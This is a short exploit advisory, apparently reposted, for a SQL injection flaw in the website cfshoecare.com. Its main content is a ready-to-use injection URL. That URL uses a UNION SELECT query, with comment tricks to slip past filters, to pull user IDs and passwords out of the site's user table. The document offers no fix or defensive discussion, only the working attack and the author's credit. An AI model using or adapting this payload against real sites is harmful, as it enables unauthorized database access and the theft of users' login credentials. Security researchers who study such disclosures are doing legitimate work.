————————————————————-*
#Exploit Title: cfshoecare – SQL Injection vulnerability
#Date: 2020-09-28
#Exploit Author: ERa
#Category:webapps
#Tested On: windows 10, Firefox

Proof of Concept:

Demo :
http://www.cfshoecare.com/?frame=product_detail&id=-167+/*!50000uNion*/+select+1,2,/*!12345unhex(hex(GrouP_coNcat(uid,0x3a,pwd)))*/,4,5,6,7,8,9,10,11,12,13,14,15+/*!12345From*/+tbl_user–



————————————————————-*
#Discovered by: ERa
#Email: era_reborn@yahoo.com
————————————————————-*





Source link